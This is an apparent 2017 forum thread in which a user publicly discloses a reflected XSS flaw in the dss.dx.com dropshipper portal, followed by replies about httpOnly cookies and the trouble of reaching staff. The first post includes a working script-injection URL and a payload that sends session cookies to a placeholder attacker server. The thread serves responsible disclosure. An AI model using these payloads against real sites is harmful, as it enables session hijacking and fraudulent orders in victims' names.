Site Bug Reports

Security vulnerability dss.dx.com

  • xordnance Wednesday, November 08, 2017 6:26 PM Reply

    Hi there,

    I've discovered a vulnerability in the management portal for dropshippers. It allows an attacker to log in as a victim using dss.dx.com by having the victim click a malicious link.

    I contacted your service center via a ticket, and although I indicated that posting this on the forum might be dangerous, they have assured me that this is the preferred way to communicate this issue.

    There is an XSS (Cross Site Scripting) in the 'batch list' page of the dss.dx.com domain. The danger is greatly increased by the cookie not having an 'httpOnly' flag, allowing it to be read by the injected code.
    To reproduce this issue, log in to the dss.dx.com domain, visit the link below, and go through the CloudFlare CAPTCHA.


    http://dss.dx.com/batch/queryBatch.action?startDate=&endDate=&batchName="><script>alert(document.cookie)</script>


    You will be greeted by alerts containing the cookie, showing the JavaScript in the URL has access to the dx.com session information.
    The cookie can be stolen by changing the JavaScript from an alert to something like this:

    "><img src=x 0nerror=this.src='http://yourevilserver/?c='+document.cookie>

    This will make the cookie show up in the logs of the remote server, allowing an attacker to use it.

    This cookie contains values like 'sessionCookie' and 'DXSSO', leading me to believe that when stolen, these tokens can be used to hijack sessions and log in as the token's owner.
    This can lead to situations where an attacker places a bulk order in a victim's name.

    If there is anything else I can do to help resolve this issue, please let me know.

    Kind regards,

    xordnance


    post edited by xordnance on 11/8/2017 at 6:41 PM
  • sheepish Top 10 Forum Poster Wednesday, November 08, 2017 6:38 PM Reply

    The danger is greatly increased by the cookie not having an 'httpOnly' flag


    Do you mean httpsOnly?


    To reproduce this issue, log in to the dss.sx.com domain


    That should probably be dx.

    DX has found a new way to deceive customers:
    Use reviews for different products that have not been bought
    by the person who wrote the review.
    http://club.dx.com/forums/forums.dx/threadid.1462252

  • xordnance Wednesday, November 08, 2017 6:43 PM Reply

    Yeah sx should be dx, I edited that.

    'httpOnly' is correct. This makes sure it can not be accessed by JavaScript. For making sure it is sent over HTTPS, there is the 'secure' flag.


  • sheepish Top 10 Forum Poster Wednesday, November 08, 2017 6:47 PM Reply

    Ah, http rather than anything else, not insecure vs secure. Thanks for posting this, and for the clarification. I'm glad I don't dropship.

    DX has found a new way to deceive customers:
    Use reviews for different products that have not been bought
    by the person who wrote the review.
    http://club.dx.com/forums/forums.dx/threadid.1462252

  • xordnance Friday, November 10, 2017 7:23 PM Reply

    Thanks :)


    I wanted to start dropshipping, but this vulnerability has made me apprehensive enough to hold off on being logged into the dss.dx.com management portal.


    post edited by xordnance on 11/10/2017 at 7:38 PM
  • xordnance Friday, November 10, 2017 7:37 PM Reply

    I read in some other thread that @Happyvicky is a staff member that might be able to handle security vulnerabilities? It says in her signature that she is on maternity leave. @Maye_Tao could you please assist me in resolving this issue?

    (Not to be impolite but I really shouldn't have to search this hard for a staff contact)


  • gasbag11 Top 10 Forum Poster Friday, November 10, 2017 9:00 PM Reply

    Sadly, Happyvicky never returned to work here, but Maye_Tao has taken over and has done an excellent job.  :)


    (Not to be impolite but I really shouldn't have to search this hard for a staff contact)


    I agree, but DX just hates admitting anything could be wrong with their site, and pretends they didn't see all the threads about various problems/site bugs here.

    ALWAYS ask questions about a specific item on its
    page. Scroll down and click on "Post a new topic".

  • xordnance Friday, November 10, 2017 9:24 PM Reply

    Hey gasbag11, thank you for your reply! I'm glad there are people interested in this and am looking forward to being contacted by IT staff.


    I agree, but DX just hates admitting anything could be wrong with their site, and pretend they didn't see all the threads about various problems/site bugs here.

    As Ayn Rand eloquently said: 'You can always avoid reality. But you can never avoid the consequences of avoiding reality'

    If it were just a bug breaking some functionality, I couldn't care less. That would not be dangerous, just annoying.
    But I've tested the vulnerability and it allows me to hijack a session and log in as my other test user. I'm very surprised that they've asked me to post the details on a public forum.


  • gasbag11 Top 10 Forum Poster Friday, November 10, 2017 10:29 PM Reply

    Most likely that CS didn't understand/comprehend the importance of your warning, and said to post here as they often do when they don't understand things. 


    I know nothing about anything you've said, but you might want to think about editing/removing anything in your previous posts which would make it easy for someone with a little more knowledge to do.


    You can give the details back to DX through a PM or a ticket once Maye_Tao replies. 


    ALWAYS ask questions about a specific item on its
    page. Scroll down and click on "Post a new topic".

  • xordnance Friday, November 10, 2017 10:58 PM Reply

    Yeah probably... 

    After their first reply was to post it here, I explained it could be used to compromise accounts, explicitly asked for a private contact and asked to double-check with management before confirming it should be posted on the forum. After that it was reiterated it should be posted here.

    So I did do my very best to have them understand the implications. If a staff member asks me to remove the info, I definitely will. 


Page 1 of 3